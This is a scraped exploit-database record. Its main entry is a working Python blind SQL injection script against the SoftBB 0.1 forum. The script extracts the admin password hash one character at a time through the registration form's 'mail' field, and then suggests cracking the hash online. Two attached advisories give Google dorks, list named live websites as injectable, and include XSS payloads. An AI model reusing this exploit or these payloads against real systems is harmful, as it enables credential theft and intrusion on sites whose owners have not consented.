{"id": "1337DAY-ID-313", "lastseen": "2018-04-08T03:48:39", "viewCount": 64, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": -1.2, "vector": "NONE", "modified": "2018-04-08T03:48:39", "rev": 2}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-18088", "1337DAY-ID-18267"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:112040", "PACKETSTORM:112679"]}], "modified": "2018-04-08T03:48:39", "rev": 2}, "vulnersScore": -1.2}, "type": "zdt", "sourceHref": "https://0day.today/exploit/313", "description": "Exploit for unknown platform in category web applications", "title": "SoftBB 0.1 (mail) Remote Blind SQL Injection Exploit", "cvelist": [], "sourceData": "====================================================\r\nSoftBB 0.1 (mail) Remote Blind SQL Injection Exploit\r\n====================================================\r\n\r\n\r\n\r\n\r\n#!/usr/bin/env python\r\n# LOTFREE TEAM 03/2006\r\n#\r\n# Vulnerability info\r\n# Product : SoftBB\r\n# Version : 0.1\r\n#\r\n# The field 'mail' in reg.php is used directly in a SQL query :\r\n# $sql = 'SELECT pseudo,mail FROM '.$prefixtable.'membres WHERE pseudo = \"'.add_gpc($pseudoreg).'\" OR mail = \"'.$mail.'\"';\r\n# We can deduce deduce the result of some sql querys according to the error messages returned\r\n# The exploit test the characters of the md5 hash one by one using a special query\r\nimport httplib, urllib\r\n\r\n# Change the following values...\r\nadmin=\"admin\"\r\nserver=\"localhost\"\r\npath=\"/forum\"\r\n#\r\nhash=\"\"\r\nchars=('a','b','c','d','e','f','1','2','3','4','5','7','8','9','0')\r\n\r\nprint \"LOTFREE TEAM SoftBB BruteForcing tool\"\r\nprint \"-------------------------------------\"\r\nfor i in range(1,33):\r\n print \"Brute forcing hash[\"+str(i)+\"]\"\r\n for a in chars:\r\n params=urllib.urlencode({'pseudo':admin,\r\n 'mdp':'1',\r\n 'mdpc':'1',\r\n 'mail':'\" union select pseudo,1 from softbb_membres where pseudo=\"'+admin+'\" and substr(mdp,'+str(i)+',1)=\"'+a+'\" limit 1,1#',\r\n 'condok':'true'})\r\n headers = {\"Content-type\": \"application/x-www-form-urlencoded\", \"Accept\": \"text/plain\"}\r\n conn = httplib.HTTPConnection(server)\r\n conn.request(\"POST\", path+\"/index.php?page=reg\", params, headers)\r\n response = conn.getresponse()\r\n data = response.read()\r\n conn.close()\r\n if data.find(\"Ce pseudonyme est d\")>0:\r\n hash=hash+a\r\n continue\r\n\r\nprint\r\nif len(hash)==32:\r\n print \"Found hash =\",hash,\"for account\",admin\r\n print \"You can use http://md5.rednoize.com/ to crack the md5 hash\"\r\nelse:\r\n print \"Exploit failed... verify the path to the forum or try changing the limit 1,1 in the sql request...\" \r\n\r\n\r\n\n# 0day.today [2018-04-08] #", "published": "2006-03-19T00:00:00", "references": [], "reporter": "LOTFREE", "modified": "2006-03-19T00:00:00", "href": "https://0day.today/exploit/description/313"}

{"zdt": [{"lastseen": "2018-04-02T03:26:24", "description": "Exploit for php platform in category web applications", "edition": 2, "published": "2012-05-14T00:00:00", "type": "zdt", "title": "Vallarta - SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-05-14T00:00:00", "id": "1337DAY-ID-18267", "href": "https://0day.today/exploit/description/18267", "sourceData": " 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n 0 _ __ __ __ 1\r\n 1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n 0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n 1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n 0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n 1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n 0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n 1 \\ \\____/ >> Exploit database separated by exploit 0\r\n 0 \\/___/ type (local, remote, DoS, etc.) 1\r\n 1 1\r\n 0 [x] Official Website: http://www.1337day.com 0\r\n 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1\r\n 0 0\r\n 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 1\r\n 0 I'm NuxbieCyber Member From Inj3ct0r TEAM 1\r\n 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0\r\n 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1\r\n\r\n ==========================================================================\r\n <<<:>>> Vallarta - SQL Injection Vulnerability <<:>>>\r\n ==========================================================================\r\n\r\n - Discovered By:\r\n ||| TheCyberNuxbie - Independent Security Research |||\r\n <<< [email\u00a0protected] >>> x CP: +62856-2538-963\r\n [ www.linuxhacktivist.com ] $ YM: nux_exploit\r\n\r\n - Use it at your risk,,,\r\n This was written for educational purpos,,,\r\n Author will be not responsible for any damage. //nuxbie\r\n\r\n ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n ./Title Exploit : Vallarta - SQL Injection Vulnerability\r\n ./URL Vendor Web: VallartaWebServices - http://www.vallartawebservices.com\r\n ./Google Dork : inurl:\"/realestate_listings.php?s1=\"\r\n intext:\"Designed and maintained by Vallarta Web Services\"\r\n ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n\r\n [xXx] SQL injection is a code injection technique that exploits a security\r\n vulnerability occurring in the database layer of an #application.\r\n The vulnerability is present when user input is either incorrectly\r\n filtered for string literal escape characters embedded in SQL #statements\r\n or user input is not strongly typed and thereby unexpectedly executed.\r\n\r\n - Affected items (SQLi):\r\n http://127.0.0.1/webapps/realestate_listings.php?s1=[SQLi]\r\n\r\n - Sample WebApps Vuln (SQLi):\r\n http://fravapv.com/realestate_listings.php?s1=2' + [SQL Injection]\r\n http://vallartasolutions.com/realestate_listings.php?s1=2' + [SQL Injection]\r\n http://blueoceansiderealty.com/realestate_listings.php?s1=313' + [SQL Injection]\r\n http://mismaloya-realestate.com/realestate_listings.php?s1=193&s7=5' + [SQL Injection]\r\n http://ixtapa-zihuatanejo-realestate.com/realestate_listings.php?s1=141' + [SQL Injection]\r\n http://puertovallartapropertyrentals.com/realestate_listings.php?s1=333' + [SQL Injection]\r\n , And Many More @ Google...!!!\r\n\r\n - Special Thanks:\r\n ...:::' 1337day - Inj3ct0r TEAM ':::...\r\n All Staff & 31337 Member Inj3ct0r TEAM,,,\r\n , And All Inj3ct0r Fans & All Hacktivist,,,\r\n\r\n #############################################################################\r\n - Me @ Solo Raya, 14 May 2012 @ 07:17 PM.\r\n [ Inj3ct0r | PacketStromSecurity | Devilzc0de | Exploit-ID | ID-BackTrack ]\r\n #############################################################################\r\n\r\n\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18267"}, {"lastseen": "2018-04-04T17:29:05", "edition": 2, "description": "Exploit for php platform in category web applications", "published": "2012-04-20T00:00:00", "type": "zdt", "title": "JA-Programacao - SQL/XSS Vulnerability", "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-04-20T00:00:00", "id": "1337DAY-ID-18088", "href": "https://0day.today/exploit/description/18088", "sourceData": "1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [x] Official Website: http://www.1337day.com 0\r\n1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1\r\n0 0\r\n1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 1\r\n0 I'm NuxbieCyber Member From Inj3ct0r TEAM 1\r\n1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1\r\n\r\n==========================================================================\r\n<<<:>>> JA-Programacao - SQL/XSS Vulnerability <<:>>>\r\n==========================================================================\r\n \r\n - Discovered By:\r\n ||| TheCyberNuxbie - Independent Security Research |||\r\n <<< [email\u00a0protected] >>> CP: +62856-2538-963\r\n [ www.linuxhacktivist.com ] $ YM: nux_exploit\r\n\r\n - Info WebApps:\r\n This CMS Develop By JAprogramacao:\r\n http://www.japrogramacao.com.br/\r\n \r\n - Google Dork:\r\n intext:\"Desenvolvido por J A Programa\u00e7\u00e3o\"\r\n \r\n - Exploit Concept:\r\n http://lokalisasi/WebApps/lerNoticia.php?id=[SQL Injection]\r\n http://lokalisasi/WebApps/lernoticia.php?id=[XSS]\r\n\r\n - Sample Web SQL Injection Vulnerability:\r\n http://www.aposcpqd.org.br/noticias/lerNoticia.php?id=313' + [SQL Injection]\r\n http://www.petsriodistribuidora.com.br/produtos/?divisao=2' + [SQL Injection]\r\n http://www.escolajatoba.com.br/noticias/lernoticia.php?id=19' + [SQL Injection]\r\n http://www.jornalagoradivinopolis.com.br/lerNoticia.php?id=762' + [SQL Injection]\r\n\r\n - Sample Web Persistent XSS Vulnerability:\r\n http://www.aposcpqd.org.br/noticias/lerNoticia.php?id=313\"><script>alert(31337);</script> <:- 'XSS' -:>\r\n http://www.petsriodistribuidora.com.br/produtos/?divisao=2\"><script>alert(31337);</script> <:- 'XSS' -:>\r\n http://www.escolajatoba.com.br/noticias/lernoticia.php?id=19\"><script>alert(31337);</script> <:- 'XSS' -:>\r\n http://www.jornalagoradivinopolis.com.br/txtProcurar.php?txtProcurar=<script>alert(31337);</script> <:- 'XSS' -:>\r\n\r\n -:>>> Special Thanks <<<:-\r\n ...:::' 1337day Inj3ct0r TEAM ':::...\r\n [ All Staff & 31337 Member Inj3ct0r TEAM ]\r\n , And All Inj3ct0r Fans & All Hacktivist,,, :-) \r\n\r\n #########################################################################\r\n - Me @ Solo Raya, 20 April 2012 @ 17:38 PM.\r\n [ Inj3ct0r | PacketStromSecurity | Exploit-DB | Exploit-ID | Devilzc0de ]\r\n #########################################################################\r\n\r\n\n\n# 0day.today [2018-04-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18088"}], "packetstorm": [{"lastseen": "2016-11-03T10:28:18", "description": "", "published": "2012-05-14T00:00:00", "type": "packetstorm", "title": "Vallarta Web Services SQL Injection", "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-05-14T00:00:00", "id": "PACKETSTORM:112679", "href": "https://packetstormsecurity.com/files/112679/Vallarta-Web-Services-SQL-Injection.html", "sourceData": "` 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 \n0 _ __ __ __ 1 \n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0 \n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1 \n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0 \n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1 \n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0 \n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1 \n1 \\ \\____/ >> Exploit database separated by exploit 0 \n0 \\/___/ type (local, remote, DoS, etc.) 1 \n1 1 \n0 [x] Official Website: http://www.1337day.com 0 \n1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 \n0 0 \n1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 1 \n0 I'm NuxbieCyber Member From Inj3ct0r TEAM 1 \n1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0 \n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 \n \n========================================================================== \n<<<:>>> Vallarta - SQL Injection Vulnerability <<:>>> \n========================================================================== \n \n- Discovered By: \n||| TheCyberNuxbie - Independent Security Research ||| \n<<< root@31337sec.com >>> x CP: +62856-2538-963 \n[ www.linuxhacktivist.com ] $ YM: nux_exploit \n \n- Use it at your risk,,, \nThis was written for educational purpos,,, \nAuthor will be not responsible for any damage. //nuxbie \n \n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ \n./Title Exploit : Vallarta - SQL Injection Vulnerability \n./URL Vendor Web: VallartaWebServices - http://www.vallartawebservices.com \n./Google Dork : inurl:\"/realestate_listings.php?s1=\" \nintext:\"Designed and maintained by Vallarta Web Services\" \n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ \n \n[xXx] SQL injection is a code injection technique that exploits a security \nvulnerability occurring in the database layer of an #application. \nThe vulnerability is present when user input is either incorrectly \nfiltered for string literal escape characters embedded in SQL #statements \nor user input is not strongly typed and thereby unexpectedly executed. \n \n- Affected items (SQLi): \nhttp://127.0.0.1/webapps/realestate_listings.php?s1=[SQLi] \n \n- Sample WebApps Vuln (SQLi): \nhttp://fravapv.com/realestate_listings.php?s1=2' + [SQL Injection] \nhttp://vallartasolutions.com/realestate_listings.php?s1=2' + [SQL Injection] \nhttp://blueoceansiderealty.com/realestate_listings.php?s1=313' + [SQL Injection] \nhttp://mismaloya-realestate.com/realestate_listings.php?s1=193&s7=5' + [SQL Injection] \nhttp://ixtapa-zihuatanejo-realestate.com/realestate_listings.php?s1=141' + [SQL Injection] \nhttp://puertovallartapropertyrentals.com/realestate_listings.php?s1=333' + [SQL Injection] \n, And Many More @ Google...!!! \n \n- Special Thanks: \n...:::' 1337day - Inj3ct0r TEAM ':::... \nAll Staff & 31337 Member Inj3ct0r TEAM,,, \n, And All Inj3ct0r Fans & All Hacktivist,,, \n \n############################################################################# \n- Me @ Solo Raya, 14 May 2012 @ 07:17 PM. \n[ Inj3ct0r | PacketStromSecurity | Devilzc0de | Exploit-ID | ID-BackTrack ] \n############################################################################# \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/112679/vallarta-sql.txt"}, {"lastseen": "2016-11-03T10:15:58", "description": "", "published": "2012-04-20T00:00:00", "type": "packetstorm", "title": "JA-Programacao CMS Cross Site Scripting / SQL Injection", "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-04-20T00:00:00", "id": "PACKETSTORM:112040", "href": "https://packetstormsecurity.com/files/112040/JA-Programacao-CMS-Cross-Site-Scripting-SQL-Injection.html", "sourceData": "`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 \n0 _ __ __ __ 1 \n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0 \n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1 \n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0 \n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1 \n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0 \n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1 \n1 \\ \\____/ >> Exploit database separated by exploit 0 \n0 \\/___/ type (local, remote, DoS, etc.) 1 \n1 1 \n0 [x] Official Website: http://www.1337day.com 0 \n1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 \n0 0 \n1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 1 \n0 I'm NuxbieCyber Member From Inj3ct0r TEAM 1 \n1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0 \n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 \n \n========================================================================== \n<<<:>>> JA-Programacao - SQL/XSS Vulnerability <<:>>> \n========================================================================== \n \n- Discovered By: \n||| TheCyberNuxbie - Independent Security Research ||| \n<<< nuxbie@linuxhacktivist.com >>> CP: +62856-2538-963 \n[ www.linuxhacktivist.com ] $ YM: nux_exploit \n \n- Info WebApps: \nThis CMS Develop By JAprogramacao: \nhttp://www.japrogramacao.com.br/ \n \n- Google Dork: \nintext:\"Desenvolvido por J A Programa\u00e7\u00e3o\" \n \n- Exploit Concept: \nhttp://lokalisasi/WebApps/lerNoticia.php?id=[SQL Injection] \nhttp://lokalisasi/WebApps/lernoticia.php?id=[XSS] \n \n- Sample Web SQL Injection Vulnerability: \nhttp://www.aposcpqd.org.br/noticias/lerNoticia.php?id=313' + [SQL Injection] \nhttp://www.petsriodistribuidora.com.br/produtos/?divisao=2' + [SQL Injection] \nhttp://www.escolajatoba.com.br/noticias/lernoticia.php?id=19' + [SQL Injection] \nhttp://www.jornalagoradivinopolis.com.br/lerNoticia.php?id=762' + [SQL Injection] \n \n- Sample Web Persistent XSS Vulnerability: \nhttp://www.aposcpqd.org.br/noticias/lerNoticia.php?id=313\"><script>alert(31337);</script> <:- 'XSS' -:> \nhttp://www.petsriodistribuidora.com.br/produtos/?divisao=2\"><script>alert(31337);</script> <:- 'XSS' -:> \nhttp://www.escolajatoba.com.br/noticias/lernoticia.php?id=19\"><script>alert(31337);</script> <:- 'XSS' -:> \nhttp://www.jornalagoradivinopolis.com.br/txtProcurar.php?txtProcurar=<script>alert(31337);</script> <:- 'XSS' -:> \n \n-:>>> Special Thanks <<<:- \n...:::' 1337day Inj3ct0r TEAM ':::... \n[ All Staff & 31337 Member Inj3ct0r TEAM ] \n, And All Inj3ct0r Fans & All Hacktivist,,, :-) \n \n######################################################################### \n- Me @ Solo Raya, 20 April 2012 @ 17:38 PM. \n[ Inj3ct0r | PacketStromSecurity | Exploit-DB | Exploit-ID | Devilzc0de ] \n######################################################################### \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/112040/japrogramacao-sqlxss.txt"}]}